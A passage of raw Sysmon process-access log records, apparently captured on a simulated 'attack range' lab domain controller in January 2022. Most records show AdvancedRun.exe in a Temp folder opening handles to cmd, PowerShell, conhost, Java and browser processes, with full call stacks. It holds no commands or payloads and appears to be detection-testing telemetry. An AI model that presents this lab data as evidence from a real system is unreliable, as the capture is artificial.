mp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.832{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079765Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079764Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079763Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.831{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
